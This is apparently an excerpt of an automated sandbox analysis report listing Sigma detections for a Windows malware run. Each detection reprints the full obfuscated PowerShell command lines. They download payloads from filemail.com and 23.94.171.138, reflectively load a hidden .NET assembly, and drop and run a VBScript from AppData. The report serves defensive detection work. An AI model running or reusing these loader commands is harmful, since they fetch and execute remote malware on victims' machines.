NZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0
                    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" , ProcessId: 8028, ProcessName: wscript.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", CommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICA
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; 